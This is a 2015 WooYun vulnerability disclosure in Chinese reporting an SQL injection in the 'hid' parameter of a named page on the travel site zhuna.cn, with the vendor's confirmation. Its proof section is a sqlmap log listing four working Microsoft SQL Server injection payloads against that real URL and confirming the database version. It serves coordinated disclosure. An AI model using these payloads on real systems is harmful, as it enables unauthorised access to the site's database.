当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100054

漏洞标题:住哪网主站存在SQL注入漏洞

相关厂商:住哪网

漏洞作者: 疏懒

提交时间:2015-03-09 12:03

修复时间:2015-04-23 12:04

公开时间:2015-04-23 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-09: 厂商已经确认,细节仅向厂商公开
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

住哪网主站存在SQL注入漏洞

详细说明:

注入点

http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962


经检测,参数hid存在注入

漏洞证明:

sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: hid
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (
original value)
Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT
4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2
=2015-3-10
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(12
0) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHA
R(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=201
5-3-8&tm2=2015-3-10
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT
(CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHA
R(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
---
[19:36:04] [INFO] testing Microsoft SQL Server
[19:36:04] [INFO] confirming Microsoft SQL Server
[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[19:36:05] [INFO] fetching database names


QQ截图20150307193950.png


修复方案:

你们专业

版权声明:转载请注明来源 疏懒@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-09 13:38

厂商回复:

非常感谢您反馈的信息,相关修复已交由技术处理。

最新状态:

暂无